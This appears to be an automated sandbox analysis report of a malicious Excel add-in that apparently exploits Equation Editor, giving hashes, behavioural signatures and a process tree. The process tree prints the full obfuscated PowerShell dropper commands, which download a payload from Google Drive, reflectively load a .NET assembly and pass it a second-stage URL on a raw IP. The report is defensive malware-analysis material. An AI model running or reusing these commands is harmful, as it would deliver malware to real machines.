Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-10-2024 13:30

General

  • Target

    2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420.xlam

  • Size

    596KB

  • MD5

    6073b84bbdc3b910df55b8b42a16ab65

  • SHA1

    28c95e7d8f2fa7dee552bcc190b7ec6aaa9ea9f3

  • SHA256

    2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420

  • SHA512

    1392956610ded25dc8e5ca50c5a15218e3a2ecdc12314ae7bf0313a47dd35c2ead7aba74fc7381542c2e107b547bbef23f9be1ea8ff653b3da1e1f951485a50d

  • SSDEEP

    12288:JJRTchjxyfDF5NYzNewgU8mLQobusNRO+IXbpwOjMbR6I6EfjOvCxicvG:JJp4j2FYReBm9bpNROtgt6zErkC7vG

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\2dad4b0d2557af1cadd3c7cb8e06f37c767c6565d2ec598a116a3063b92b0420.xlam
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2508
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:1812
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\medicallaboratorydatinglover.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2724
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWVYKCAoJ3FPJysnNGltYWdlVXJsID0gaDFTaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgaDFTO3FPNHcnKydlYkNsaWVuJysndCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDJysnbCcrJ2llbnQ7cU80aW1hZ2VCeXRlcyA9IHFPNHdlYkNsaWVudC4nKydEb3dubG9hZERhdGEocU80aW1hJysnZ2VVcmwpO3EnKydPNGltYWdlVGV4dCA9IFtTJysneXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHFPJysnNGltYWdlQnl0ZXMpO3FPJysnNHN0YXJ0RmxhZyA9IGgxUzw8QkFTRTY0X1NUQVJUPj5oMVM7cU80ZW5kRmxhZyA9IGgxUzw8QkFTRTY0X0VORD4+aDFTO3FPNHN0YXJ0SW5kZXggPSBxTzRpbWFnZVRlJysneHQuSW5kZXhPZihxTzRzdGFydEZsYWcpO3FPNGVuZEluZGV4ID0gcU80aW1hZ2VUZXh0LkluZGV4T2YocU80ZW5kRmxhZyk7cU80cycrJ3RhcnRJbmRleCAtZ2UgMCAtYW5kIHFPNGVuZEluZGV4IC1ndCBxTzRzdGFydEluZCcrJ2V4O3FPNHN0YXJ0SW5kZXggKz0gcU80c3RhcnRGbGEnKydnLkxlbmd0aDtxTzRiYXNlNjRMZW5ndGggPSBxTzRlbmRJbmRleCAtIHFPNHN0YXJ0SW5kZXg7cU80YmFzZTY0Q29tbWFuZCA9IHFPNGltYWdlVGV4dC5TdWJzdCcrJ3JpbmcocU80c3RhcnRJbmRleCwgcU80YmFzZTY0TGVuZ3RoJysnKTtxTzRiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChxTzRiYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgS3lJIEZvckVhY2gtT2JqZWN0IHsgcU80XyB9KScrJ1stMS4uLShxTzRiYXNlNjRDb21tYW5kLkxlbmd0aCldO3FPNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZScrJ20uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocU80YmFzZTY0UmV2ZXJzZWQpO3FPNGxvYWRlZEEnKydzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChxTzRjb21tYW5kQnl0ZXMpO3FPNHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaDFTVkFJaDFTKTtxTzR2YWlNZXRob2QuSW52b2tlKHFPNG51bGwsIEAoaDFTdHh0LjQ0NDZlc2FiYmJiYmInKydiYmJiZXdtYWRhbS80MzEuODcxLjY0Ljg5MS8vOnB0dGhoMVMsIGgxU2Rlc2F0aXZhZG9oMVMsIGgxU2Rlc2F0aXZhJysnZG9oMVMsIGgxU2Rlc2F0aXZhZG9oMVMsIGgxJysnU0FkZEluUHJvY2VzczMyaDFTLCBoMVMnKydkZXNhdGl2YWRvaDFTLCBoMVNkZXNhdGl2YWRvaDFTLGgxU2Rlc2F0aXZhZG9oMVMsaDFTZGVzYXRpdmFkb2gxUyxoMVNkZXNhdGknKyd2YWRvaDFTLGgxU2Rlc2F0aXZhZG9oMVMsaDFTZGVzYXRpdmFkb2gxUyxoMVMxaDFTLGgxU2Rlc2F0aXZhZG9oMVMpKTsnKS5yZVBsQWNFKChbQ2hhUl0xMTMrW0NoYVJdNzkrW0NoYVJdNTIpLCckJykucmVQbEFjRSgoW0NoYVJdNzUrW0NoYVJdMTIxK1tDaGFSXTczKSxbc3RyaU5nXVtDaGFSXTEyNCkucmVQbEFjRSgoW0NoYVJdMTA0K1tDaGFSXTQ5K1tDaGFSXTgzKSxbc3RyaU5nXVtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2900
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IeX( ('qO'+'4imageUrl = h1Shttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur h1S;qO4w'+'ebClien'+'t = New-Object System.Net.WebC'+'l'+'ient;qO4imageBytes = qO4webClient.'+'DownloadData(qO4ima'+'geUrl);q'+'O4imageText = [S'+'ystem.Text.Encoding]::UTF8.GetString(qO'+'4imageBytes);qO'+'4startFlag = h1S<<BASE64_START>>h1S;qO4endFlag = h1S<<BASE64_END>>h1S;qO4startIndex = qO4imageTe'+'xt.IndexOf(qO4startFlag);qO4endIndex = qO4imageText.IndexOf(qO4endFlag);qO4s'+'tartIndex -ge 0 -and qO4endIndex -gt qO4startInd'+'ex;qO4startIndex += qO4startFla'+'g.Length;qO4base64Length = qO4endIndex - qO4startIndex;qO4base64Command = qO4imageText.Subst'+'ring(qO4startIndex, qO4base64Length'+');qO4base64Reversed = -join (qO4base64Command.To'+'CharArray() KyI ForEach-Object { qO4_ })'+'[-1..-(qO4base64Command.Length)];qO4commandBytes = [Syste'+'m.Convert]::FromBase64String(qO4base64Reversed);qO4loadedA'+'ssembly = [System.Reflection.Assembly]::Load(qO4commandBytes);qO4vaiMethod = [dnlib.IO.Home].GetMethod(h1SVAIh1S);qO4vaiMethod.Invoke(qO4null, @(h1Stxt.4446esabbbbbb'+'bbbbewmadam/431.871.64.891//:ptthh1S, h1Sdesativadoh1S, h1Sdesativa'+'doh1S, h1Sdesativadoh1S, h1'+'SAddInProcess32h1S, h1S'+'desativadoh1S, h1Sdesativadoh1S,h1Sdesativadoh1S,h1Sdesativadoh1S,h1Sdesati'+'vadoh1S,h1Sdesativadoh1S,h1Sdesativadoh1S,h1S1h1S,h1Sdesativadoh1S));').rePlAcE(([ChaR]113+[ChaR]79+[ChaR]52),'$').rePlAcE(([ChaR]75+[ChaR]121+[ChaR]73),[striNg][ChaR]124).rePlAcE(([ChaR]104+[ChaR]49+[ChaR]83),[striNg][ChaR]39) )"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2712

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    1a55947f9e52ea2b60d984e5d3569e44

    SHA1

    8aeeeb5c9e0c1a402de12381e6a95040fc713ebb

    SHA256

    b7a925df4629e9373c3b4a27aa236ec892addcce15c4c45cbd60f2ef3c214c48

    SHA512

    7c8cfc5ad0fe64877805b9920e6e7e6c10e6a0e01b4680efec0abe14c8aa0c15ca18ab7fd35558583c47710607c2c07ec24bbe3f734a1588a0f0b75fc955914d

  • C:\Users\Admin\AppData\Roaming\medicallaboratorydatinglover.vbs

    Filesize

    136KB

    MD5

    d62f25ced5ad03573d59a9d6fe47faef

    SHA1

    c3252d74ed8960f8372b09e170c3e679a085429b

    SHA256

    80bd9d4929c8a9f3909a7a8f143ca4f5d7e14efd477ae19e638c1d4d9e753bdc

    SHA512

    a8e676bcbd422e27bbfe87a992b42050304282c25cccc83a8950896d2b465483752d1eb7d269d4bb2b1b08e946bc09cbde150c5735e5b5f14734cf0052cf7bd6

  • memory/2508-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2508-1-0x0000000071D6D000-0x0000000071D78000-memory.dmp

    Filesize

    44KB

  • memory/2508-16-0x0000000071D6D000-0x0000000071D78000-memory.dmp

    Filesize

    44KB